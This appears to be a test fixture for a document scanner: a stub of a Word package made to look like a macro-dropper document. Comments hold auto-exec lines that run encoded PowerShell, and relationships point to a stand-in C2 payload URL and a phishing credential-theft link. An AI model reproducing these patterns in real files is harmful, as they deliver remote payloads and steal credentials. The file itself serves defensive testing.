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vbaProject.bin" ContentType="application/vnd.ms-office.activeX+xml"/>
  <Override PartName="/word/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject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>
  <!-- AutoOpen() Macro — SIMULATION TEST ONLY -->
  <!-- Shell("cmd.exe /c powershell -EncodedCommand " & Base64Encode(payload)) -->
  <!-- CreateObject("WScript.Shell").Run payload, 0, False -->
  <w:body>
    <w:p>
      <w:r>
        <w:t>TrustLayer AI - Macro Threat Simulation Document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document contains: VBA project stub, external OLE object link, auto-exec macro patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>FOR TESTING PURPOSES ONLY — No actual malicious code present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <!-- EICAR-inspired test string (document variant) -->
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>TRUSTLAYER-TEST-DOC-SIMULATION-MACRO-DROPPER-PATTERN-0xDEAD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vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="http://malicious-macro-c2.example.com/payload.bin" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
    Target="http://phishing-macro.example.com/steal-creds" TargetMode="External"/>
</Relationships>
</file>